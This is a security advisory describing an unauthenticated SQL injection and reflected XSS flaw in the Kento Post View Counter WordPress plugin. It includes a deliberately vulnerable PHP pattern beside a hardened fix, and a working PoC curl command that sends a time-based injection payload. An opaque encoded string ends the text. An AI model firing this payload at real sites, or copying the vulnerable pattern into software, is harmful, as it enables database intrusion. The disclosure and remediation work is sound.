Kento Post View Counter [SQL Injection]

Description

The WordPress plugin Kento Post View Counter is vulnerable to SQL injection.

The plugin registers an AJAX action, kento_pvc_top_geo, that is available to unauthenticated users as well as logged-in ones (it is hooked on wp_ajax_nopriv_ in addition to wp_ajax_, so anyone who can reach /wp-admin/admin-ajax.php can trigger it). The action calls the kento_pvc_top_geo() function, which builds its SQL queries from request input without sanitizing that input and echoes the same input back without escaping it.

The vulnerable parameter is $_POST['kento_pvc_geo']. Because its value reaches the query unsanitized and the response unescaped, it can be abused for SQL injection or for reflected XSS (DWF-2016-87022).
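As an added example that is not the plugin's own code, the pattern the advisory describes is shown below beside a hardened version. The table name kento_pvc_views, the column names, the capability and the nonce action are assumptions; the query shape (input spliced in directly after SELECT) is inferred from the PoC payload, which only parses if it lands there. Only the WordPress API calls are real.

```php
<?php
// Added illustration, not the plugin's source. Table name, column names,
// capability and nonce action are assumptions; the query shape is inferred
// from the advisory's PoC payload. In a real plugin only one of the two
// callbacks below would be registered.

/* ---- Vulnerable pattern described in the advisory ---------------------- */

// Hooking the same callback on wp_ajax_nopriv_ makes it reachable by anyone
// who can POST to /wp-admin/admin-ajax.php, logged in or not.
add_action( 'wp_ajax_kento_pvc_top_geo',        'kento_pvc_top_geo_vulnerable' );
add_action( 'wp_ajax_nopriv_kento_pvc_top_geo', 'kento_pvc_top_geo_vulnerable' );

function kento_pvc_top_geo_vulnerable() {
    global $wpdb;
    $geo = $_POST['kento_pvc_geo'];   // untrusted, used as-is

    // SQL injection: the value becomes part of the statement text, so
    // " * from wp_users where ID=1 or sleep(1); --" rewrites the query.
    $rows = $wpdb->get_results(
        "SELECT $geo, COUNT(*) AS hits FROM {$wpdb->prefix}kento_pvc_views GROUP BY $geo"
    );

    // Reflected XSS: the same value is echoed into the HTML response.
    echo '<h3>Top views by ' . $geo . '</h3>';
    foreach ( (array) $rows as $row ) {
        echo '<p>' . $row->hits . '</p>';
    }
    wp_die();
}

/* ---- Hardened version --------------------------------------------------- */

// No wp_ajax_nopriv_ hook: anonymous requests never reach the callback.
add_action( 'wp_ajax_kento_pvc_top_geo', 'kento_pvc_top_geo_hardened' );

function kento_pvc_top_geo_hardened() {
    global $wpdb;

    // Authorization: restrict to users allowed to read the statistics
    // (the capability is an assumption; match it to the plugin's admin page).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // CSRF: the admin page must embed wp_create_nonce( 'kento_pvc_top_geo' )
    // and send it as `nonce`; check_ajax_referer() dies on mismatch.
    check_ajax_referer( 'kento_pvc_top_geo', 'nonce' );

    // The parameter names a column. Identifiers cannot be bound with
    // $wpdb->prepare() placeholders, so map the input onto an allow-list
    // instead of trying to escape it.
    $allowed = array( 'country' => 'country', 'city' => 'city' );
    $key     = isset( $_POST['kento_pvc_geo'] )
        ? sanitize_key( wp_unslash( $_POST['kento_pvc_geo'] ) )
        : '';
    if ( ! isset( $allowed[ $key ] ) ) {
        wp_send_json_error( 'invalid geo field', 400 );
    }
    $column = $allowed[ $key ];

    // Everything that is data rather than an identifier goes through
    // prepare(); %d forces the limit to an integer.
    $sql = $wpdb->prepare(
        "SELECT `$column` AS geo, COUNT(*) AS hits
           FROM `{$wpdb->prefix}kento_pvc_views`
          GROUP BY `$column`
          ORDER BY hits DESC
          LIMIT %d",
        10
    );
    $rows = $wpdb->get_results( $sql );

    // Escape on output, so a crafted stored value cannot become script in
    // the response either.
    $html = '<h3>Top views by ' . esc_html( $column ) . '</h3><ul>';
    foreach ( (array) $rows as $row ) {
        $html .= '<li>' . esc_html( $row->geo ) . ': ' . (int) $row->hits . '</li>';
    }
    echo $html . '</ul>';
    wp_die();
}
```

The allow-list is the important part: $wpdb->prepare() only protects values, so a parameter that selects a column or table has to be validated against a fixed set of identifiers rather than escaped. Dropping the wp_ajax_nopriv_ hook and adding the nonce and capability checks closes the unauthenticated path that makes the original issue reachable by anyone.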

PoC

SQL Injection Attack

curl -XPOST 'http://wp1.dev/wp-admin/admin-ajax.php' \
    -d 'action=kento_pvc_top_geo' \
    -d 'kento_pvc_geo= * from wp_users where ID=1 or sleep(1); --'

The injected value is sent raw by -d (use --data-urlencode if an intermediary rejects unencoded spaces). Note that MySQL short-circuits ID=1 OR sleep(1) on the row where ID=1 is true, so the observable delay is roughly one second per other row in wp_users; on a site with a single user the request returns without a noticeable delay.

INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX